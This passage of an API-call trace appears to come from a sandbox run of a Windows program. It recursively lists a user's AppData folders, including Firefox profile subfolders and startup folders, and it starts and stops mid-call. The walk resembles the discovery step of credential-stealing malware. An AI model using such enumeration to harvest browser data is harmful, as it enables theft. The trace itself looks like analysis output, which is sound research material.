returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories" [0251.537] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0251.537] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x44067a0 [0251.537] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Administrative Tools" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools" [0251.537] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0251.537] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x44067a0 [0251.537] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Maintenance" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance" [0251.537] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0251.537] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x44067a0 [0251.538] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Startup" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" [0251.538] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0251.538] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x44067a0 [0251.538] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="System Tools" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools" [0251.538] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*" [0251.538] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x44067a0 [0251.538] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Windows PowerShell" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell" [0251.538] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*" [0251.538] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x44067a0 [0251.538] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Templates" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Templates") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Templates" [0251.538] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Templates", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0251.538] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x44064a0 [0251.539] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Themes" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes" [0251.539] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0251.539] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x44067a0 [0251.539] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="CachedFiles" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles" [0251.539] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*" [0251.539] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x44079a0 [0251.539] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Word" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word" [0251.539] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\*" [0251.539] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x44067a0 [0251.539] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word", pszFile="STARTUP" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0251.539] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0251.540] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x4406e60 [0251.540] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="Mozilla" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla" [0251.540] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\*" [0251.540] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x4406e60 [0251.541] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla", pszFile="Extensions" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions" [0251.541] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0251.541] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x44079a0 [0251.541] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla", pszFile="Firefox" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox" [0251.541] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\*" [0251.541] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x44067a0 [0251.541] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="Crash Reports" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0251.541] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*" [0251.541] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x44079a0 [0251.541] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", pszFile="events" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events" [0251.541] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*" [0251.541] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x44064a0 [0251.542] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="Profiles" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0251.542] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0251.542] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x44079a0 [0251.542] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="8i341t8m.default" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0251.542] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*" [0251.542] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x44064a0 [0251.542] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="bookmarkbackups" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups" [0251.542] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*" [0251.542] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0f850 [0251.542] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="crashes" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes" [0251.542] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*" [0251.542] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0fbb0 [0251.543] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", pszFile="events" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events" [0251.543] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*" [0251.543] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x5c0f850 [0251.543] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="datareporting" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting" [0251.543] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*" [0251.543] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0f850 [0251.543] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", pszFile="archived" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived" [0251.543] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*" [0251.543] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x5c103f0 [0251.543] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", pszFile="2017-05" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05" [0251.543] PathCombineW (in: pszDest=0x235cff0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*" [0251.543] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*", lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0x5c0ee90 [0251.544] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="gmp" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp" [0251.545] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*" [0251.545] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c103f0 [0251.545] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", pszFile="WINNT_x86-msvc" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc" [0251.545] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", pszFile="*" | out: 